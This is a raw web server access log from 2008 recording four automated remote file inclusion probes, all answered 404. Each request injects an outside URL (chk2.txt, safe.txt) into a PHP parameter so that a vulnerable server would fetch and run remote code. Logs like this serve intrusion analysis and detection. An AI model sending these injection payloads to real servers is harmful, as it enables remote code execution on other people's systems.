209.25.195.243 - - [06/Aug/2008:21:34:17 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
209.25.195.243 - - [06/Aug/2008:21:34:17 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
147.202.40.223 - - [06/Aug/2008:21:34:27 -0500] "GET /logs//login.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.814"
147.202.40.223 - - [06/Aug/2008:21:34:27 -0500] "GET //login.php?dir=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.814"
